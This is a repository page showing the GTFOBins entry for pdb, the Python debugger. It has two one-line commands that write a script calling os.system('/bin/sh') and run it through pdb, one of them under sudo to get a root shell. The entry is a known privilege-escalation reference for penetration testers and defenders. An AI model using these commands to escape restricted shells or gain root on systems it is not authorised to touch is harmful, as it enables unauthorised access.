This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
1342a7b9818ec9590c54342910af391f28cddff2
GTFOBins.github.io
/
_gtfobins
/
pdb.md
Andrea Cardaci
1342a7b981
Avoid temp directory in pdb
2020-03-15 12:35:00 +01:00
275 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp) echo 'import os; os.system("/bin/sh")' > $TF pdb $TF cont
code
TF=$(mktemp) echo 'import os; os.system("/bin/sh")' > $TF sudo pdb $TF cont
Reference in New Issue
View Git Blame
Copy Permalink